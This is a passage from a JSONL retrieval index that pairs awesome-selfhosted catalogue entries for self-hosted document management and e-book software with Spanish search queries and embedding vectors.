"fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: SeedDMS β€” Document Management System with workflows, access rights, fulltext search, and more [GPL-2.0, PHP]. Signature PDF β€” Sign and manipulate PDFs with collaboration, organization, compression and metadata editing [AGPL-3.0, PHP/deb/Docker]. SimpleDMS β€” Easy-to-use, metadata-driven, open-source document management system (DMS) for small businesses that sorts documents almost by itself [AGPL-3.0, Docker]. Stirling-PDF β€” Local hosted web application that allows you to perform various operations on PDF files, such as merging, splitting, file conversions and OCR [Apache-2.0, Docker/Java].", "indexar": "con que puedo firmar y editar archivos PDF desde mi ordenador sin internet", "v": [0.1364, 0.08155, 0.00929, -0.1389, 0.09506, -0.09451, -0.03078, -0.02334, -0.1433, -0.02217, -0.01457, -0.08015, 0.01469, -0.15853, 0.06114, -0.05833, 0.11304, 0.00293, 0.11091, -0.05505, 0.10329, 0.0635, -0.03049, -0.05741, 0.00428, -0.03345, -0.10978, 0.0778, -0.0842, -0.01686, -0.01511, 0.05292, 0.09145, -0.02803, -0.08879, 0.03531, 0.04378, 0.1605, 0.0339, 0.04517, 0.09527, 0.14941, -0.06739, 0.12616, 0.03674, -0.02288, 0.0381, -0.044, 0.07302, 0.01232, -0.01718, -0.12428, -0.06603, -0.01185, -0.12445, -0.06697, 0.1575, -0.12257, 0.08179, -0.0801, -0.05252, 0.13825, -0.05138, 0.03755, -0.03976, 0.06443, -0.05148, 0.05443, -0.06791, 0.12379, -0.01054, 0.08909, -0.05449, -0.11652, -0.00452, 0.00491, -0.02717, -0.11635, 0.04846, 0.03748, 0.05557, -0.03399, -0.03394, -0.00207, -0.07031, -0.08245, -0.06028, -0.08439, 0.01825, -0.05499, 0.08514, 0.01299, 0.0096, -0.04144, 0.00274, -0.02633, 0.09139, -0.0365, -0.01546, -0.06302, 0.03047, 0.1244, -0.05616, 0.07615, -0.06869, -0.04547, -0.03378, 0.03827, -0.00256, 0.00844, 0.11313, 0.00248, -0.0131, -0.03279, -0.10065, -0.07596, 0.07951, -0.11243, -0.05172, -0.04774, 0.01858, -0.04384, -0.0323, -0.01606, -0.00034, 0.0414, 0.0485, 0.0774, -0.09916, -0.03893, 0.08277, 0.01273, -0.09328, -0.1047, -0.02911, 0.03739, -0.05526, -0.08102, -0.04151, -0.07004, 0.0591, -0.04263, -0.09353, 0.08328, -0.00871, 0.04061, -0.00144, -0.02111, -0.12113, -0.1306, -0.03314, 0.00163, -0.01225, 0.04006, -0.01237, 0.07787, 0.00375, 0.01775, -0.02249, 0.04687, -0.04909, 0.03793, 0.03702, -0.04929, -0.08418, 0.01635, -0.08835, 0.01423, 0.01757, -0.02259, -0.08897, -0.00266, -0.09743, -0.08475, 0.07041, -0.02636, -0.0114, 0.06357, 0.03271, 0.03661, -0.05511, 0.04091, 0.00939, 0.06484, -0.09125, 0.03793, 0.04691, -0.01563, -0.05284, 0.01499, 0.00047, 0.02068, -0.03359, 0.07682, 0.02585, -0.02976, -0.11434, 0.03059, 0.06188, -0.02452, -0.06577, -0.03078, -0.05912, 0.00447, 0.05485, 0.04648, -0.00818, -0.00994, -0.01637, 0.01275, -0.04356, -0.04842, -0.00722, -0.07404, -0.01981, -0.03938, 0.06147, 0.00322, 0.00621, 0.02166, 0.09056, -0.02172, 0.09158, 0.00941, 0.07178, -0.0262, 0.04041, -0.00234, -0.01692, 1e-05, 0.04628, -0.00357, -0.04029, -0.04059, -0.02149, 0.0037, 0.02487, -0.02307, -0.09107, 0.03203, -0.03039, 0.05337, 0.02404, -0.07234, -0.01285, -0.05013, -0.09434, -0.01062, -0.01455, -0.04913, -0.05037, 0.02678, 0.04256, 0.0113, -0.00129, 0.00979]} -{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: SeedDMS β€” Document Management System with workflows, access rights, fulltext search, and more [GPL-2.0, PHP]. Signature PDF β€” Sign and manipulate PDFs with collaboration, organization, compression and metadata editing [AGPL-3.0, PHP/deb/Docker]. SimpleDMS β€” Easy-to-use, metadata-driven, open-source document management system (DMS) for small businesses that sorts documents almost by itself [AGPL-3.0, Docker]. Stirling-PDF β€” Local hosted web application that allows you to perform various operations on PDF files, such as merging, splitting, file conversions and OCR [Apache-2.0, Docker/Java].", "indexar": "cual es una alternativa gratuita para crear un sistema de gestiΓ³n documental", "v": [-0.05348, 0.04386, -0.03187, -0.19912, -0.00375, -0.03431, -0.0478, 0.00777, -0.15542, -0.02466, -0.06112, -0.18596, -0.0325, -0.12264, -0.00131, -0.06993, 0.14878, -0.10306, 0.03411, -0.07379, -0.05723, -0.0232, 0.031, -0.02664, -0.0525, -0.10319, -0.0561, -0.09992, -0.04099, 0.02133, 0.09139, 0.04303, -0.01844, -0.07228, -0.04177, 0.0435, 0.06593, 0.05494, 0.01005, -0.02382, -0.003, -0.03848, -0.03167, 0.23584, 0.00684, -0.05587, 0.01095, 0.03035, -0.02863, 0.02378, -0.07151, 0.03734, -0.09526, 0.08619, 0.10025, -0.18665, 0.02138, -0.19666, 0.01957, -0.06269, -0.0487, 0.05563, -0.0164, -0.04974, 0.05709, -0.00065, 0.02497, -0.01983, -0.06682, 0.08034, 0.00795, -0.04621, 0.09445, 0.02896, -0.04685, -0.00701, 0.00245, -0.01759, -0.0434, 0.04141, 0.08458, -0.05899, 0.07154, 0.04838, -0.0959, -0.02538, 0.04182, -0.00571, 0.05221, -0.07085, -0.0329, -0.05016, 0.02123, 0.07021, 0.0801, -0.06554, 0.10783, 0.00949, -0.10559, 0.04636, -0.09598, -0.01829, -0.11265, 0.07193, 0.02786, 0.07848, 0.02229, -0.01347, -0.10549, 0.01913, -0.0358, 0.04842, 0.00314, 0.03444, -0.00561, -0.01174, 0.02436, 0.06318, -0.03673, 0.00646, 0.01464, 0.03248, -0.07587, -0.1208, 0.09303, -0.00608, 0.03051, 0.01855, 0.01067, 0.13072, 0.10821, 0.01692, -0.07932, -0.07137, 0.01118, -0.14002, 0.04337, 0.00199, -0.00601, -0.08746, -0.02813, 0.0041, 0.02251, -0.04115, 0.04346, -0.08276, -0.01072, -0.01097, 0.02058, 0.01694, -0.08118, -0.03899, -0.01786, -0.01785, -0.06332, 0.04919, 0.06147, -0.05317, -0.17451, 0.0277, 0.10918, -0.02802, -0.02165, 0.01221, -0.02044, -0.0131, -0.0345, 0.01499, -0.02212, -0.01756, 0.07493, 0.00188, 0.06699, -0.04584, 0.05452, -0.10633, 0.00365, -0.13905, 0.06587, -0.05, 0.00596, 0.01837, -0.03193, 0.03055, -0.00966, -0.08684, -0.02508, 0.06607, 0.02847, 0.07556, 0.04896, 0.02201, -0.02732, -0.02941, -0.02634, -0.05025, -0.00835, -0.1254, -0.00448, 0.07921, -0.07225, -0.01552, 0.00499, -0.03621, -0.01167, -0.00148, -0.00821, 0.07208, 0.05819, 0.0525, 0.0068, 0.03141, 0.02766, -0.04467, -0.08479, 0.02968, -0.0208, 0.00027, -0.00423, -0.07217, 0.08082, -0.05163, 0.01263, 0.01327, 0.01239, 0.00536, 0.04024, 0.06631, -0.10722, -0.11077, -0.00326, -0.05485, 0.01934, 0.03191, 0.0281, 0.0153, 0.01691, -0.03451, -0.00741, -0.02059, 0.02964, 0.13186, -0.0216, 0.04132, -0.04154, -0.03865, -0.04344, 0.01645, 0.0048, -0.10536, 0.00914, 0.04809, -0.01315, -0.00511, 0.01506, -0.00115]} -{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Atsumeru β€” Manga/comic/light novel media server with clients for Windows, Linux, macOS and Android [MIT, Java/Docker]. Bindery β€” Folder-watching converter for e-books and comics. EPUB to Kobo KEPUB via kepubify, CBZ/CBR/PDF via Kindle Comic Converter, with per-device profiles, ComicInfo.xml naming, chapter-to-volume bundling and a web UI [MIT, Docker]. BookLogr β€” Manage your personal book library with ease [Apache-2.0, Docker]. Calibre Web Automated β€” All-in-one solution, combining the modern lightweight web UI from Calibre-Web with the robust, versatile feature set of Calibre (fork of Calibre Web) [GPL-3.0, Docker]. Calibre Web β€” Browse, read and download eBooks using an existing Calibre database [GPL-3.0, Python]. Calibre β€” E-book library manager that can view, convert, and catalog e-books in most of the major e-book formats and provides a built-in Web server for remote clients [GPL-3.0, Python/deb]. Inkheart β€” Lightweight PDF library and reader [Apache-2.0, Docker].", "indexar": "que programa me sirve para organizar y leer mis libros en formato epub?", "v": [0.00897, 0.08437, -0.09376, -0.18727, 0.06936, -0.09545, -0.01027, 0.03221, -0.13298, -0.2204, -0.14474, -0.06806, 0.0532, -0.06686, -0.02334, -0.04904, 0.13539, -0.0509, 0.04731, 0.01012, 0.03527, 0.06844, -0.08107, 0.00238, -0.01547, 0.01964, 0.0017, 0.03723, -0.01962, 0.07959, 0.00037, 0.13964, 0.05732, -0.13297, -0.01455, 0.0765, 0.11352, 0.05354, -0.16781, 0.0606, 0.00024, 0.01524, 0.00927, 0.07578, 0.01535, -0.09725, 0.06251, 0.07686, -0.05951, 0.09552, 0.01976, 0.05526, -0.00659, 0.01651, 0.00646, -0.11437, -0.06399, -0.14478, -0.03075, 0.05625, 0.00512, -0.00676, 0.09974, -0.07998, 0.16834, 0.09555, 0.00214, 0.03669, -0.12741, 0.02242, -0.07776, 0.03492, -0.02186, -0.06336, -0.02658, 0.061, -0.04532, 0.01318, 0.04175, -0.0025, 0.08973, -0.01068, -0.01812, 0.09459, -0.01767, -0.01223, -0.03089, -0.00616, 0.02311, 0.00745, -0.0272, 0.08341, 0.03016, 0.01076, -0.01008, -0.16527, 0.08749, 0.02136, 0.03588, 0.04649, 0.04398, -0.04499, -0.07198, 0.05931, -0.14213, -0.02443, -0.00206, 0.04215, 0.02382, 0.08587, -0.0321, 0.06082, 0.00207, 0.02641, -0.05511, -0.10586, 0.15609, -0.00015, 0.06554, 0.00281, -0.14882, 0.00424, -0.08509, 0.0431, 0.14779, 0.01993, 0.08068, 0.04605, 0.01434, 0.01171, 0.03686, -0.01401, -0.0414, -0.00586, -0.03507, -0.11944, -0.05895, 0.00483, -0.03667, -0.0676, 0.01339, 0.03548, -0.04093, -0.03379, -0.05399, -0.12915, 0.08921, -0.0372, -0.01754, -0.0125, -0.01629, 0.01059, 0.06826, 0.05162, -0.03188, -0.05698, 0.01328, -0.04856, -0.02456, 0.02387, -0.01283, 0.05036, 0.03778, -0.05801, -0.04803, -0.0803, 0.05485, -0.02419, 0.08375, 0.04753, -0.05357, 0.01628, 0.08105, -0.0612, 0.01413, -0.01955, -0.01862, -0.03129, 0.05484, 0.05781, -0.0818, 0.02867, 0.07353, 0.00323, -0.09934, -0.05031, -0.00493, -0.01633, -0.01374, -0.08211, 0.01835, 0.03395, -0.02129, -0.0708, -0.00416, -0.03343, -0.14934, 0.03436, 0.05105, -0.04257, -0.04645, -0.0285, -0.04009, 0.0454, 0.05095, 0.03035, -0.01373, 0.06777, 0.01895, 0.09108, -0.03605, -0.02517, 0.0144, 0.00829, -0.03675, -0.0647, -0.05039, 0.0299, 0.04236, 0.04225, 0.03228, -0.01466, 0.06708, -0.04556, 0.02755, -0.10139, 0.05511, -0.00054, 0.0358, 0.04976, -0.0213, -0.03816, 0.00958, 0.03592, -0.02597, -0.00531, 0.0477, -0.00388, -0.01828, -0.07207, -0.0086, 0.03861, -0.00772, -0.04563, -0.04294, -0.0269, -0.07609, 0.04091, -0.01595, 0.00636, -0.04109, 0.04566, 0.05193, -0.03313, 0.00692, -0.03452]} -{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Atsumeru β€” Manga/comic/light novel media server with clients for Windows, Linux, macOS and Android [MIT, Java/Docker]. Bindery β€” Folder-watching converter for e-books and comics. EPUB to Kobo KEPUB via kepubify, CBZ/CBR/PDF via Kindle Comic Converter, with per-device profiles, ComicInfo.xml naming, chapter-to-volume bundling and a web UI [MIT, Docker]. BookLogr β€” Manage your personal book library with ease [Apache-2.0, Docker]. Calibre Web Automated β€” All-in-one solution, combining the modern lightweight web UI from Calibre-Web with the robust, versatile feature set of Calibre (fork of Calibre Web) [GPL-3.0, Docker]. Calibre Web β€” Browse, read and download eBooks using an existing Calibre database [GPL-3.0, Python]. Calibre β€” E-book library manager that can view, convert, and catalog e-books in most of the major e-book formats and provides a built-in Web server for remote clients [GPL-3.0, Python/deb]. Inkheart β€” Lightweight PDF library and reader [Apache-2.0, Docker].", "indexar": "con que puedo convertir mis cΓ³mics de pdf a un formato compatible con mi lector kobo?", "v": [0.08408, -0.0057, -0.08883, -0.01981, -0.03621, -0.12494, 0.03923, 0.169, -0.1078, -0.21505, -0.00174, -0.035, -0.02211, -0.09105, 0.06689, -0.07996, 0.1056, -0.06498, -0.0452, 0.04552, 0.18868, -0.06399, -0.02814, -0.08299, 0.20885, -0.00406, -0.01646, 0.00021, 0.00952, 0.00992, -0.09803, 0.00641, 0.02692, -0.02088, -0.14315, 0.05293, 0.06949, 0.12243, -0.00265, 0.14501, 0.11418, 0.07008, -0.05044, 0.0035, -0.05112, -0.08717, -0.02076, -0.03105, -0.08734, 0.05868, -0.02229, 0.01826, -0.07085, 0.04195, -0.09898, -0.14934, 0.14957, -0.0371, 0.04081, 0.06185, -0.01018, 0.0336, 0.00082, -0.13972, 0.04455, 0.00291, -0.04146, 0.03, -0.05993, 0.00035, -0.0743, 0.04136, 0.0352, -0.01763, -0.00445, 0.02417, -0.10539, -0.10563, 0.07118, -0.03902, 0.08093, -0.09291, -0.04855, -0.02883, 0.12981, 0.01338, -0.02348, -0.09808, 0.09118, 0.03434, -0.04304, -0.02988, 0.05844, -0.03867, -0.0386, -0.07125, -0.04085, -0.0312, -0.0353, 0.07314, 0.00875, 0.05025, -0.08897, 0.00435, -0.01161, -0.05842, -0.09742, -0.0094, 0.01356, 0.13957, 0.02954, 0.09529, -2e-05, -0.07059, -0.11489, -0.07081, -0.00842, -0.05721, 0.05228, -0.02323, -0.12326, -0.01468, -0.06788, 0.11069, 0.07885, 0.05998, 0.05032, 0.02917, -0.08777, -0.04604, -0.01784, -0.02246, -0.05163, -0.04884, 0.00561, 0.01139, 0.0054, 0.01338, -0.05512, 0.03468, 0.00302, 0.03001, 0.04967, 0.06394, -0.03777, -0.10601, -0.00567, -0.01417, -0.0325, -0.0771, -0.05732, 0.02212, 0.08872, 0.00322, 0.00258, -0.00878, 0.05551, -0.05744, 0.06199, -0.01109, 0.02923, 0.03386, 0.05904, -0.09537, -0.10006, -0.03556, -0.03904, -0.07175, 0.07411, 0.03453, -0.11245, -0.0039, -0.0103, -0.02753, 0.10662, -0.00765, -0.09204, 0.05696, 0.04823, 0.04841, -0.01849, 0.01126, -0.00045, 0.03186, -0.10156, -0.04636, 0.04916, -0.04871, 0.04853, -0.09903, 0.01123, 0.00577, 0.02353, -0.00676, 0.06955, -0.04461, -0.05961, 0.05034, 0.01365, -0.04324, -0.06051, 0.04981, -0.0027, 0.07697, 0.06078, 0.02145, -0.04499, 0.09744, -0.00335, 0.01072, 0.01224, 0.02989, 0.01653, -0.00449, -0.01532, -0.07471, 0.00625, -0.02746, 0.02401, 0.01963, 0.0142, 0.01953, 0.05108, -0.04701, -0.04751, -0.0372, 0.02535, -0.02258, -0.00925, 0.07672, -0.0079, 0.05687, 0.00985, 0.0225, -0.06304, 0.04049, -0.00726, 0.03005, -0.05458, -0.02918, 0.0249, 0.03666, 0.022, -0.01258, -0.02267, -0.01573, -0.0832, 0.03527, -0.03003, -0.05047, 0.01475, 0.01038, 0.05939, -0.0438, 0.03209, -0.02344]} -{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Atsumeru β€” Manga/comic/light novel media server with clients for Windows, Linux, macOS and Android [MIT, Java/Docker]. Bindery β€” Folder-watching converter for e-books and comics. EPUB to Kobo KEPUB via kepubify, CBZ/CBR/PDF via Kindle Comic Converter, with per-device profiles, ComicInfo.xml naming, chapter-to-volume bundling and a web UI [MIT, Docker]. BookLogr β€” Manage your personal book library with ease [Apache-2.0, Docker]. Calibre Web Automated β€” All-in-one solution, combining the modern lightweight web UI from Calibre-Web with the robust, versatile feature set of Calibre (fork of Calibre Web) [GPL-3.0, Docker]. Calibre Web β€” Browse, read and download eBooks using an existing Calibre database [GPL-3.0, Python]. Calibre β€” E-book library manager that can view, convert, and catalog e-books in most of the major e-book formats and provides a built-in Web server for remote clients [GPL-3.0, Python/deb]. Inkheart β€” Lightweight PDF library and reader [Apache-2.0, Docker].", "indexar": "cual es la mejor opcion libre para gestionar una biblioteca personal de e-books?", "v": [0.00609, 0.0367, -0.02939, -0.10607, -0.03165, -0.14791, -0.06846, -0.00892, -0.11866, -0.18331, -0.05856, -0.11644, -0.00171, 0.0701, -0.01883, -0.08023, 0.09905, -0.08356, 0.07443, 0.01922, 0.01861, 0.08901, -0.03827, 0.02912, 0.03731, -0.0806, 0.08048, -0.00623, -0.06431, 0.15574, 0.01635, -0.003, 0.03774, -0.11129, 0.06897, 0.1018, 0.06131, 0.06031, 0.00686, -0.02229, -0.02263, 0.03568, 0.05076, 0.18358, 0.06683, -0.04936, 0.08486, 0.09162, 0.00567, 0.04391, -0.08683, -0.04424, -0.01017, -0.02449, 0.09124, -0.01361, 0.02178, -0.0619, 0.01852, -0.05035, -0.07739, 0.08074, -0.00802, -0.10733, 0.11827, 0.0034, -0.00669, 0.02318, -0.07345, 0.11239, -0.01874, -0.02071, -0.00657, 0.08966, -0.05666, 0.0641, 0.03808, 0.0479, 0.07598, 0.03594, 0.0432, -0.07424, -0.04727, 0.03338, -0.07158, 0.01503, 0.02584, -0.07166, 0.08382, 0.08517, -0.00365, -0.02642, -0.11466, -0.06493, 0.06684, -0.09881, 0.01371, 0.00514, -0.01954, 0.08076, 0.04786, 0.02179, -0.06855, 0.08702, -0.07177, -0.01668, -0.06013, -0.01872, 0.0038, -0.09954, 0.00249, 0.00639, 0.07263, 0.03533, -0.01874, -0.02481, 0.03056, -0.03719, 0.1019, 0.09686, -0.16869, -0.11922, -0.08808, -0.10709, 0.11603, 0.08994, 0.17102, 0.04455, -0.00132, 0.0045, 0.00954, -0.03502, -0.04563, -0.06139, -0.09214, 0.01268, -0.03887, -0.13647, -0.05415, -0.1102, -0.00098, -0.02554, -0.02446, -0.00831, -0.0, -0.13615, 0.00971, 0.04062, 0.0604, -0.04827, -0.03654, -0.05193, 0.12625, 0.09133, 0.01658, 0.09044, 0.05843, -0.06331, -0.06429, 0.02407, 0.02944, 0.0277, 0.01004, 0.00873, -0.0903, -0.01424, 0.01697, 0.00658, 0.02894, -0.01494, -0.0812, 0.01688, -0.01265, -0.03829, 0.00795, -0.09976, -0.03047, -0.02867, 0.06415, 0.08179, -0.01826, -0.01071, 0.00886, -0.06457, -0.07224, -0.10791, -0.03118, -0.04884, -0.04149, -0.06783, -0.02045, 0.0292, -0.01738, -0.02755, 0.0491, 0.00404, -0.06153, 0.05848, 0.02656, -0.04057, -0.00158, 0.01301, -0.03135, 0.08513, 0.05491, -0.00929, -0.0521, 0.07867, -0.00066, -0.0336, 0.02177, 0.0393, 0.06961, 0.00316, -0.07986, -0.04017, -0.06568, 0.00452, 0.02145, -0.09388, 0.06243, 0.00202, 0.06655, -0.02257, 0.04768, -0.03035, 0.01726, 0.00925, 0.01953, 0.02088, -0.01392, -0.04601, 0.03592, 0.01578, 0.0169, 0.00442, 0.08472, 0.04167, 0.02585, -0.06592, 0.02347, 0.08996, -0.04086, -0.04766, -0.0024, -0.01779, -0.13301, 0.01786, -0.02829, -0.04476, -0.04931, -0.02207, 0.00441, 0.02188, 0.07037, -0.06137]} -{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Kapowarr β€” Build and manage a comic book library. Download, rename, move and convert issues of the volume to your liking [GPL-3.0, Docker/Python]. Kavita β€” Cross-platform e-book/manga/comic/pdf server and web reader with user management, ratings and reviews, and metadata support [GPL-3.0, .NET/Docker]. kiwix-serve β€” HTTP daemon for serving wikis from ZIM files [GPL-3.0, C++]. Komga β€” Media server for comics/mangas/BDs with API and OPDS support, a modern web interface for exploring your libraries, as well as a web reader [MIT, Java/Docker]. MyMangaDB β€” Manga collection manager with automatic metadata, MyAnimeList import and detailed collection statistics [⚠, GPL-3.0, Docker]. Stump β€” A fast, free and open source comics, manga and digital book server with OPDS support [MIT, Rust].", "indexar": "que programa puedo usar para gestionar y leer mi biblioteca de cΓ³mics en casa", "v": [0.00038, 0.04328, -0.08707, -0.16342, -0.05342, -0.11703, -0.08378, 0.10315, -0.08764, -0.19939, -0.10652, -0.10573, -0.04736, -0.02307, -0.03072, -0.04798, 0.09159, -0.07763, 0.02745, 0.00561, 0.11266, 0.08981, -0.0581, 0.08629, 0.03706, -0.03668, 0.1431, -0.06387, 0.0262, 0.1235, -0.07058, 0.0391, 0.10205, -0.14204, -0.04107, 0.0253, 0.04658, -0.02378, 0.05811, 0.04768, 0.04208, 0.07584, -0.01781, 0.03213, 0.01539, -0.04093, 0.11126, -0.0907, -0.09849, 0.00355, -0.11953, -0.05366, -0.0423, 0.03858, 0.02419, -0.10568, 0.01152, -0.10376, -0.04332, -0.0274, -0.08669, -0.00582, -0.00157, -0.05984, 0.06799, -0.00952, 0.00831, 0.05258, -0.08529, 0.10485, -0.09065, 0.05492, 0.00428, 0.01092, -0.06351, 0.01716, -0.02973, -0.11531, 0.13098, -0.08688, -0.00617, -0.05318, -0.01987, 0.00605, 0.00935, -0.04241, -0.01507, -0.11456, 0.09285, 0.01413, -0.11927, 0.00267, -0.09947, -0.0586, 0.07409, -0.06278, 0.08173, 0.01121, 0.02876, 0.05486, 0.02026, -0.02606, -0.05928, 0.14696, -0.05238, 0.00082, 0.02857, -0.04028, -0.02078, -0.06358, -0.00979, -0.02795, 0.00194, -0.02882, -0.09354, 0.01105, 0.01014, -0.03343, 0.12583, -0.02316, -0.1756, 0.00903, -0.02587, 0.02429, 0.12412, -0.01577, 0.18964, 0.01459, -0.05193, 0.02005, -0.07996, -0.04838, -0.06009, -0.05259, -0.06158, 0.04169, -0.10335, -0.07182, -0.07483, -0.05313, 0.05178, 0.05848, 0.0025, 0.02338, 0.02439, -0.09194, -0.03071, 0.00207, -0.00607, -0.03332, -0.00763, -0.03766, 0.08528, 0.02506, 0.033, 0.05704, 0.08568, -0.06901, -0.03587, -0.03014, -0.04315, 0.03874, 0.01597, -0.07133, -0.06064, 0.00521, 0.03351, 0.02856, 0.01291, 0.07649, -0.09942, 0.07553, -0.02164, -0.00743, 0.06638, -0.08544, -0.02157, -0.01818, 0.01883, 0.05547, -0.04516, -0.0259, 0.04247, -0.03509, -0.11324, -0.04504, -0.01297, 0.03664, -0.04347, -0.09159, -0.06693, -0.00297, 0.02027, 0.04161, 0.00482, -0.01444, -0.05413, 0.04772, 0.0538, -0.07202, -0.03617, 0.05854, 0.04284, 0.0886, 0.07788, 0.03004, -0.0009, 0.06015, 0.00475, 0.01115, -0.01247, -0.00066, 0.05402, 0.03759, -0.03947, -0.09006, -0.06491, 0.03234, 0.06752, -0.00877, 0.02686, 0.03129, 0.02895, -0.00254, 0.01181, -0.05241, 0.0199, -0.04441, 0.0262, 0.07661, -0.05564, -0.02714, 0.06485, 0.05614, 0.00368, -0.03211, 0.04545, 0.03174, -0.01705, -0.03417, -0.04185, 0.1037, 0.01305, 0.00764, -0.00789, -0.0246, -0.10288, 0.05964, -0.03232, -0.01472, -0.01372, -0.01258, 0.04104, -0.02305, 0.05389, 0.03301]} -{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Kapowarr β€” Build and manage a comic book library. Download, rename, move and convert issues of the volume to your liking [GPL-3.0, Docker/Python]. Kavita β€” Cross-platform e-book/manga/comic/pdf server and web reader with user management, ratings and reviews, and metadata support [GPL-3.0, .NET/Docker]. kiwix-serve β€” HTTP daemon for serving wikis from ZIM files [GPL-3.0, C++]. Komga β€” Media server for comics/mangas/BDs with API and OPDS support, a modern web interface for exploring your libraries, as well as a web reader [MIT, Java/Docker]. MyMangaDB β€” Manga collection manager with automatic metadata, MyAnimeList import and detailed collection statistics [⚠, GPL-3.0, Docker]. Stump β€” A fast, free and open source comics, manga and digital book server with OPDS support [MIT, Rust].", "indexar": "con quΓ© herramienta puedo organizar y convertir mis libros electrΓ³nicos automΓ‘ticamente", "v": [0.09282, 0.16916, -0.08153, -0.09494, 0.09001, -0.03661, 0.01783, 0.02325, -0.18944, -0.23091, -0.19169, -0.0485, 0.03124, -0.04855, 0.09541, 0.02091, 0.16611, -0.13975, -0.035, 0.00137, -0.00879, -0.03955, -0.13281, -0.05859, -0.00396, -0.0287, -0.02474, 0.09632, -0.15906, 0.13637, -0.00345, 0.09091, 0.09894, -0.09567, -0.02356, -0.027, 0.05548, 0.1498, -0.0522, -0.06107, -0.01918, 0.08561, -0.04026, 0.04087, 0.03086, -0.04068, 0.02022, 0.01884, 0.00898, 0.04367, -0.02928, -0.03419, -0.14533, -0.03655, 0.00908, -0.15868, 0.14102, -0.13947, 0.10059, -0.0555, -0.02517, 0.06613, 0.02897, 0.03631, 0.09357, 0.10872, -0.03997, -0.06306, -0.1278, 0.0661, 0.00938, 0.00941, -0.00484, -0.01501, 0.02904, 0.0697, 0.00062, 0.06129, 0.02222, 0.0411, 0.02509, -0.09417, 0.01384, 0.03142, -0.00696, -0.09875, -0.0069, -0.0209, 0.05676, -0.07918, -0.02601, 0.03262, 0.01581, -0.02066, 0.05432, -0.02588, 0.06694, -0.01266, 0.02094, 0.08604, 0.08544, -0.05895, -0.06155, 0.1097, -0.13983, -0.06382, -0.04249, 0.03197, 0.04992, -0.04688, -0.03264, 0.02021, 0.00471, -0.02791, -0.03729, -0.00516, 0.07446, -0.05593, 0.01827, 0.02485, -0.05248, -0.0294, -0.00757, -0.03598, 0.06244, 0.01311, 0.03041, 0.1174, 0.01826, -0.04166, 0.0507, -0.09233, -0.04164, -0.01275, -0.01874, -0.01879, -0.061, -0.08941, -0.00509, -0.07487, -0.0161, 0.04175, -0.03801, -0.1181, 0.03841, -0.07531, 0.0666, -0.04744, -0.06792, -0.00258, -0.02207, -0.03414, 0.0076, 0.08451, -0.02335, 0.06292, -0.04039, -0.0658, -0.0356, 0.03752, -0.05052, 0.00483, 0.05292, 0.0039, -0.04441, -0.05462, 0.01925, 0.0114, 0.03355, 0.01707, -0.05753, -0.00162, 0.03949, -0.05867, -0.0155, -0.04981, -0.03713, 0.02387, 0.07796, -0.06478, -0.06136, 0.07794, -0.03387, -0.06281, -0.04985, -0.02603, 0.05473, -0.07861, 0.02152, 0.01832, 0.00175, 0.04595, -0.01892, -0.06726, 0.03541, -0.02959, -0.11073, -0.0039, 0.02596, -0.06197, -0.02919, -0.02845, -0.00637, 0.01191, 0.04163, 0.0469, -0.03511, 0.05325, -0.02372, 0.05272, -0.02736, -0.05132, 0.04687, -0.02133, -0.05815, -0.03821, -0.06507, -0.02845, -0.02987, 0.0344, 0.08719, -0.01724, 0.0549, -0.01771, 0.0282, 0.01542, 0.02195, 0.06345, 0.05273, 0.0433, -0.04022, -0.03358, -0.00474, 0.01855, 0.01212, 0.00496, 0.05032, -0.06451, -0.08376, -0.00145, -0.00203, 0.06832, -0.00668, -0.05786, -0.04955, -0.03435, -0.0595, 0.02567, -0.03802, -0.06141, -0.02022, 0.04454, 0.0705, -0.04263, -0.00928, -0.02325]} -{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Kapowarr β€” Build and manage a comic book library. Download, rename, move and convert issues of the volume to your liking [GPL-3.0, Docker/Python]. Kavita β€” Cross-platform e-book/manga/comic/pdf server and web reader with user management, ratings and reviews, and metadata support [GPL-3.0, .NET/Docker]. kiwix-serve β€” HTTP daemon for serving wikis from ZIM files [GPL-3.0, C++]. Komga β€” Media server for comics/mangas/BDs with API and OPDS support, a modern web interface for exploring your libraries, as well as a web reader [MIT, Java/Docker]. MyMangaDB β€” Manga collection manager with automatic metadata, MyAnimeList import and detailed collection statistics [⚠, GPL-3.0, Docker]. Stump β€” A fast, free and open source comics, manga and digital book server with OPDS support [MIT, Rust].", "indexar": "cual es una alternativa libre a los servicios de lectura de mangas que funcione desde un servidor propio", "v": [-0.03036, 0.09102, -0.17105, -0.0757, -0.11634, -0.11513, -0.06489, -0.05893, -0.12171, -0.10417, 